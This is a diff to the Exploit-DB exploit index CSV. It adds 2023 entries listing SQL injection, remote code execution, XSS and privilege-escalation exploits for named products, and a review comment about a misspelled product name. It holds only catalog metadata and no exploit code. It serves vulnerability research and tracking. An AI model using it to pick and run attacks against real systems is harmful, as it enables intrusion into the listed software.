 45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py
 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
 51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",2022-08-09,"Karthik UJ",webapps,php,,2022-08-09,2022-08-09,0,CVE-2022-31101,,,,,
@@ -28341,6 +28364,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11554,exploits/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,webapps,php,,2010-02-22,,1,,,,,,
 5733,exploits/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,webapps,php,,2008-06-02,,1,OSVDB-46738;CVE-2008-6678;OSVDB-46736;CVE-2008-6677;OSVDB-46228;CVE-2008-6676;OSVDB-46227;CVE-2008-6675;OSVDB-46226;OSVDB-46225;OSVDB-46224;OSVDB-46223;CVE-2008-6674;OSVDB-46222;CVE-2008-6673;OSVDB-46221;OSVDB-46220;OSVDB-46219,,,,,http://bugreport.ir/index.php?/39
 4193,exploits/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,webapps,php,,2007-07-17,,1,OSVDB-36358;CVE-2007-3933,,,,,
+51474,exploits/php/webapps/51474.txt,"Quicklancer v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 26828,exploits/php/webapps/26828.txt,"QuickPayPro 3.1 - 'customer.tickets.view.php' Multiple SQL Injections",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21677,,,,,https://www.securityfocus.com/bid/15863/info
 26830,exploits/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21679,,,,,https://www.securityfocus.com/bid/15863/info
 26827,exploits/php/webapps/26827.txt,"QuickPayPro 3.1 - 'popups.edit.php?popupid' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21676,,,,,https://www.securityfocus.com/bid/15863/info
@@ -29489,6 +29513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",webapps,php,,2011-06-23,2015-01-23,1,,,,,,https://www.securityfocus.com/bid/48399/info
 35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,,2011-06-21,2015-01-23,1,OSVDB-73201,,,,,https://www.securityfocus.com/bid/48355/info
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
+51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,,2018-05-29,2018-05-29,0,CVE-2018-11535,,,,,
 25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
 25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
@@ -29571,6 +29596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
 10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
 5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,webapps,php,,2008-01-28,2016-11-14,1,OSVDB-40780;CVE-2008-0503,,,,http://www.exploit-db.comsmart-publisher-1.0.1.zip,
+51472,exploits/php/webapps/51472.txt,"Smart School v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80,2018-07-18,2018-07-18,0,,"SQL Injection (SQLi)",,,,
 34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,webapps,php,,2010-01-10,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40468/info
 10977,exploits/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,webapps,php,,2010-01-02,,1,,,,,,
@@ -29972,6 +29998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24227,exploits/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",webapps,php,,2004-06-21,2013-01-19,1,CVE-2004-0591;OSVDB-7214,,,,,https://www.securityfocus.com/bid/10588/info
 26200,exploits/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",webapps,php,,2005-08-29,2013-06-14,1,CVE-2005-2769;OSVDB-19047,,,,,https://www.securityfocus.com/bid/14676/info
 8636,exploits/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,webapps,php,,2009-05-06,,1,OSVDB-54793;CVE-2009-1799,,,,,
+51473,exploits/php/webapps/51473.txt,"Stackposts Social Marketing Tool v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 25189,exploits/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",webapps,php,,2005-03-04,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12726/info
 25192,exploits/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,webapps,php,,2005-03-05,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12735/info
 36031,exploits/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",webapps,php,,2015-02-09,2015-02-09,0,,,,,,
@@ -30516,6 +30543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9674,exploits/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,webapps,php,,2009-09-14,,1,OSVDB-58249,,,,,
 47814,exploits/php/webapps/47814.txt,"Thrive Smart Home 1.1 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,,2019-12-30,2019-12-30,0,,,,,,
 47583,exploits/php/webapps/47583.txt,"thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80,2019-11-05,2019-11-05,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comMillhouse-Project-master.zip,
+51450,exploits/php/webapps/51450.php,"thrsrossi Millhouse-Project 1.414 - Remote Code Execution",2023-05-23,"Chokri Hammedi",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 27687,exploits/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,webapps,php,,2006-04-19,2013-08-19,1,CVE-2006-1926;OSVDB-27435,,,,,https://www.securityfocus.com/bid/17606/info
 27711,exploits/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",webapps,php,,2006-04-20,2013-08-20,1,CVE-2006-2037;OSVDB-25210,,,,,https://www.securityfocus.com/bid/17627/info
 3124,exploits/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,webapps,php,,2007-01-13,2016-09-21,1,OSVDB-32837;CVE-2007-0340,,,,http://www.exploit-db.comthwb-300-beta-2.84-php5.tar.gz,
@@ -30661,6 +30689,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16090,exploits/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",webapps,php,,2011-02-01,2012-06-22,0,OSVDB-70743,,,,http://www.exploit-db.comtwg183.zip,
 18322,exploits/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,webapps,php,,2012-01-06,2012-01-06,0,OSVDB-82603;OSVDB-82481;CVE-2012-5347,,,,,
 36094,exploits/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,webapps,php,,2011-08-31,2015-02-16,1,,,,,,https://www.securityfocus.com/bid/49393/info
+51443,exploits/php/webapps/51443.txt,"TinyWebGallery v2.5 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 51442,exploits/php/webapps/51442.txt,"TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Mirabbas Ağalarov",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
 5947,exploits/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,webapps,php,,2008-06-25,2016-12-09,1,OSVDB-46526;CVE-2008-5168,,,,,
 23322,exploits/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,webapps,php,,2012-12-12,2012-12-12,0,OSVDB-88394;OSVDB-88393,,,,http://www.exploit-db.comTipsOfTheDay.zip,
@@ -31785,6 +31814,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,,
 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
+51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
 44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,,2018-05-21,2018-05-22,0,,,,,,
@@ -32015,6 +32045,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22812,exploits/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",webapps,php,,2003-06-20,2012-11-18,1,,,,,,https://www.securityfocus.com/bid/7995/info
 3717,exploits/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,webapps,php,,2007-04-11,,1,OSVDB-35747;CVE-2007-2307,,,,,
 38024,exploits/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",webapps,php,,2012-07-19,2015-08-31,1,CVE-2012-5851;OSVDB-87521,,,,,https://www.securityfocus.com/bid/56570/info
+51465,exploits/php/webapps/51465.txt,"Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)",2023-05-23,"Astik Rawat",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-30256,,,,,
 9164,exploits/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password",2009-07-16,TiGeR-Dz,webapps,php,,2009-07-15,,1,,,,,,
 9162,exploits/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,webapps,php,,2009-07-14,,1,OSVDB-61553;CVE-2009-4560,,,,,
 9165,exploits/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,webapps,php,,2009-07-15,,1,OSVDB-61554;CVE-2009-4561,,,,,
@@ -32512,6 +32543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19524,exploits/php/webapps/19524.txt,"WordPress Plugin Backup 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",webapps,php,,2012-07-02,2012-07-04,1,OSVDB-83701,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt20000/backup.png,http://www.exploit-db.combackup.2.0.1.zip,
 50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",2021-11-08,"Murat DEMİRCİ",webapps,php,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.combackup-and-restore-for-wp.1.0.3.zip,
 50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",2021-07-05,"Ron Jost",webapps,php,,2021-07-05,2021-07-05,0,CVE-2021-24155,,,,http://www.exploit-db.combackup.1.5.8.zip,
+51445,exploits/php/webapps/51445.txt,"WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup",2023-05-23,Wadeek,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 4593,exploits/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,webapps,php,,2007-10-31,,1,OSVDB-38479;CVE-2007-5800;OSVDB-38478;OSVDB-38477;OSVDB-38476,"WordPress Plugin",,,,
 17056,exploits/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution",2011-03-28,"Sense of Security",webapps,php,,2011-03-28,2011-03-28,0,OSVDB-71481;CVE-2011-4342,"WordPress Plugin",,,,http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
 35400,exploits/php/webapps/35400.txt,"WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",webapps,php,,2011-02-28,2014-11-30,1,,,,,,https://www.securityfocus.com/bid/46610/info
@@ -34481,6 +34513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
 45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
 45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
+51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
 46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
 41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
 40236,exploits/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,webapps,ruby,80,2016-08-15,2016-08-15,0,CVE-2016-4340,,,,,
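Review bot: The new row 51446 spells the product "Cameleon CMS", while the existing row 45592 directly above it spells it "CAMALEON CMS" and the application archive name in that row is `camaleon-cms-2.4.0.tar.gz`, so the two entries for the same software will no longer group together under a product search. Unless the author deliberately chose that spelling, the description should match the project name, e.g. `"Camaleon CMS 2.7.4 - Persistent Stored XSS in Post Title"`. The row also carries no CVE or source URL in its trailing columns, so the description is the only field that ties it to the vulnerable project; getting the name right matters more than usual here.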
@@ -39960,6 +39993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,local,windows,,2014-03-12,2014-03-12,0,OSVDB-104323;CVE-2014-3222,,,,,http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-329170.htm
 21988,exploits/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode (SEH)",2012-10-15,Dark-Puzzle,local,windows,,2012-10-15,2012-10-15,0,OSVDB-87008;CVE-2012-6568,,,,,
 40807,exploits/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",local,windows,,2016-11-22,2016-11-22,1,CVE-2016-8769,,,,,
+51461,exploits/windows/local/51461.txt,"Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking",2023-05-23,"Ahsan Azad",local,windows,,2023-05-23,2023-05-23,0,,,,,,
 35177,exploits/windows/local/35177.py,"i-FTP 2.20 - Local Buffer Overflow (SEH)",2014-11-06,metacom,local,windows,,2014-11-06,2016-10-10,1,OSVDB-114279,,,,http://www.exploit-db.comiftp-win32-v220.exe,
 35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,local,windows,,2015-01-01,2015-01-01,1,OSVDB-114279,"Metasploit Framework (MSF)",,,http://www.exploit-db.comiftp-win32-v220.exe,
 35040,exploits/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous",local,windows,,2014-10-22,2014-10-22,0,CVE-2014-5507;OSVDB-113675,,,,,
@@ -40700,6 +40734,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18657,exploits/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",local,windows,,2012-03-23,2012-05-27,1,OSVDB-80532,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-27-at-21851-pm.png,http://www.exploit-db.commmplayer.zip,
 47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows,,2019-09-27,2019-10-03,0,,,,,,
 47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,,2019-11-18,2019-11-18,0,,,,,,
+51479,exploits/windows/local/51479.txt,"MobileTrans 4.0.11 - Weak Service Privilege Escalation",2023-05-23,"Thurein Soe",local,windows,,2023-05-23,2023-05-23,0,CVE-2023-31748,,,,,
 36053,exploits/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",local,windows,,2015-02-11,2015-02-11,0,OSVDB-118128,,,,http://www.exploit-db.commooplayer-1.3.0.zip,
 36819,exploits/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",local,windows,,2015-04-22,2015-04-22,1,OSVDB-118128,,,http://www.exploit-db.com/screenshots/idlt37000/screen-shot-2015-04-22-at-70835-pm.png,http://www.exploit-db.commooplayer-1.3.0.zip,
 13942,exploits/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,local,windows,,2010-06-19,,1,CVE-2010-2439;OSVDB-65789,,,http://www.exploit-db.com/screenshots/idlt14000/13942.png,http://www.exploit-db.comMoreAmp-0.1.25-binWin.zip,
@@ -41313,6 +41348,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
 47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,,2017-09-28,2017-09-28,1,,,,,,
+51453,exploits/windows/local/51453.txt,"Trend Micro OfficeScan Client 10.0 - ACL Service LPE",2023-05-23,msd0pe,local,windows,,2023-05-23,2023-05-23,0,,,,,,
 15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows,,2010-11-01,2010-11-12,1,OSVDB-69018,,,,http://www.exploit-db.comTrend_Micro.exe,
 44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,,2018-06-08,2018-06-08,1,CVE-2018-10507,,,,,
 50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",2022-01-05,"Yehia Elghaly",local,windows,,2022-01-05,2022-01-05,0,,,,,http://www.exploit-db.comRemote_System_monitor_Server_3.61_x86_Setup.exe,
@@ -45332,6 +45368,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42154,exploits/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",webapps,windows,,2017-06-11,2017-06-11,1,,,,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2017-06-11-at-112909.png,http://www.exploit-db.comecssetup.exe,
 47811,exploits/windows/webapps/47811.txt,"elearning-script 1.0 - Authentication Bypass",2019-12-30,riamloo,webapps,windows,,2019-12-30,2019-12-30,0,,,,,,
 20349,exploits/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2591;OSVDB-84520,,,http://www.exploit-db.com/screenshots/idlt20500/emailarchitect-payload-0.png,,
+51467,exploits/windows/webapps/51467.txt,"eScan Management Console 14.0.1400.2281 - Cross Site Scripting",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31703,,,,,
+51466,exploits/windows/webapps/51466.txt,"eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31702,,,,,
 20350,exploits/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2590;OSVDB-84747,,,http://www.exploit-db.com/screenshots/idlt20500/supportportal-payload-0.png,,
 45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,,2018-09-03,2018-09-03,0,CVE-2018-16252,"XML External Entity (XXE)",,,http://www.exploit-db.comelex_setup.exe,
 38379,exploits/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,webapps,windows,,2015-10-02,2015-10-02,0,OSVDB-128434;OSVDB-128433;OSVDB-128432,,,,,http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt